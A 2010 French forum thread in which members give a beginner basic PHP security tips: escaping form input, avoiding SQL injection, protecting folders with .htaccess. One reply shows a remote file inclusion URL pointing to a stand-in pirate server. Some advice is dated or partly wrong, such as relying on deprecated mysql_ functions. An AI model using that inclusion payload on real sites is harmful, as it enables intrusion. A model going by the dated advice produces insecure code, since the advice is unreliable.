Forums Webou.net - Hébergement gratuit et sans publicités avec PHP/MySQL Webou Webou Pro
Recherche avancée  
*
Bienvenue, Invité. Veuillez vous connecter ou vous inscrire.
Avez-vous perdu votre courriel d'activation?
24 Novembre 2017, 12:34:14


Connexion avec identifiant, mot de passe et durée de la session


Pages: [1]   Bas de page
  Imprimer  
Auteur Fil de discussion: coder site en php ?  (Lu 2630 fois)
0 Membres et 1 Invité sur ce fil de discussion.
X-Plose
Nouveau
*
Hors ligne Hors ligne

Messages: 1



Voir le profil
« le: 25 Février 2010, 23:31:06 »

Salut
je veut savoir comment coder un site en php pour eviter d'etre hacker .
merci Tire la langue
Journalisée
Forums Webou.net - Hébergement gratuit et sans publicités avec PHP/MySQL
« le: 25 Février 2010, 23:31:06 »

 Journalisée
jackomony
Nouveau
*
Hors ligne Hors ligne

Messages: 1


Voir le profil
« Répondre #1 le: 26 Février 2010, 09:48:42 »

Tout d'abord il être pro pour eviter cela à 99%. Huh
Cependant pense à traiter les données que tu récupère chez tes visiteurs Choqué...
exple: Zones de saisie, transfert de données par GET
Faut penser par exple à la fonction htmlentities()...
Mais il exite un tas de conseils autre mon ami Grimaçant
Journalisée
yous78
Nouveau
*
Hors ligne Hors ligne

Messages: 7


Voir le profil
« Répondre #2 le: 11 Mars 2010, 19:53:12 »

Il existe plusieurs sites qui peuvent t'aider comme par exemple http://www.siteduzero.com.

Mon site : www.infosmobile.webou.net
Journalisée

le hollandais volant
Habitué
**
Hors ligne Hors ligne

Messages: 81



Voir le profil WWW
« Répondre #3 le: 13 Mars 2010, 14:33:18 »

salut !

+1 pour le tuto PHP du site du zéro.

Le php peut permettre à un utilisateur de "hacker" ton site s'il est mal codé. Y'a quelques rudiments à savoir :

=> les formulaires (tout ce que le visiteur peut faire sur ton site) : TOUJOURS utilise "htmlspecialchars". Si un visiteur tapes du code HTML dans un commentaire et que le code n'est pas traité, il peut très bien aussi taper du PHP ou un scripte. (du genre "affiche le mot de passe de tout le monde").
Que ce soient des formulaires pour laisser un commentaire dans un livre d'or, une fonction de recherche sur ton site ou même une case à cocher : TOUJOURS utiliser htmlspecialchars

=> les donnés que PHP met dans les URL des pages : si on veut inclure une page, il ne faut pas mettre "mapage?inclure=message42.php".
Certes, la page affichera le message n°42 dans la page, mais n'importe qui peut changer l'url. Et donc mettre par exemple "mapage?inclure=http://serveur_du_pirate/afficher_mot_passe.php"

etc…

Le site du zéro parle de trucs comme ça.

Il faut aussi prendre des mots de passes forts (pas du genre "bonjour" ou "toto").
Journalisée
Keanjyto
Bavard
***
Hors ligne Hors ligne

Messages: 170


Voir le profil WWW
« Répondre #4 le: 22 Avril 2010, 05:20:15 »

Salut,

Pour éviter d'être hacké il faut protéger toutes ses variables PHP ($_GET['...'] et autres) et ne pas les inclure directement dans son code (par exemple avec un htmlentities();). Ensuite, attention aux injections SQL pour les bases de données et utilises les fichiers .htaccess pour protéger tes dossiers sensibles (i.e. là où tu mets des identifiants ou ton panneau d'administration par exemple).

En cherchant sur Google ce dont je viens de parler, tu trouveras beaucoup de tutoriels pour t'aider à faire du code plus sûr. A noter que la sécurité absolue n'existe pas! On fait toujours une petite erreur qu'un hacker peut exploiter, le but est de faire en sorte qu'il en bave pour trouver une faille Souriant

Cordialement,
Keanjyto.
Journalisée
Forums Webou.net - Hébergement gratuit et sans publicités avec PHP/MySQL
« Répondre #4 le: 22 Avril 2010, 05:20:15 »

 Journalisée
Yusite
Nouveau
*
Hors ligne Hors ligne

Messages: 6


Voir le profil
« Répondre #5 le: 22 Avril 2010, 19:40:15 »

Pour les injections SQL, sert toi de la fonction mysql_real_escape_string() ou addslashes(), ça revient au même mais j'ai cru comprendre sur le site du zéro qu'une faille a été trouvée sur cette fonction, donc mieux vaut utiliser mysql_real_escape_string().
Journalisée
Keanjyto
Bavard
***
Hors ligne Hors ligne

Messages: 170


Voir le profil WWW
« Répondre #6 le: 24 Avril 2010, 05:23:43 »

Il existe 3 types d'injections de code, la fonction "mysql_real_escape_string()" ne protège que contre 1 de ces 3 types (voir sur le siteduzero ou sur developpez.com pour les tutoriaux de mise en place de protections Clin d'oeil ).
++
Journalisée
@lex 3001
Habitué
**
Hors ligne Hors ligne

Messages: 81



Voir le profil WWW
« Répondre #7 le: 04 Mai 2010, 20:00:45 »

Comme on le dit toujours , Never trust user input. Clin d'oeil
le reste a été dit ^^
Journalisée
Pages: [1]   Haut de page
  Imprimer  
 
Aller à:  

Propulsé par MySQL Propulsé par PHP Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Dilber MC Theme by HarzeM
Page générée en 0.024 secondes avec 21 requêtes.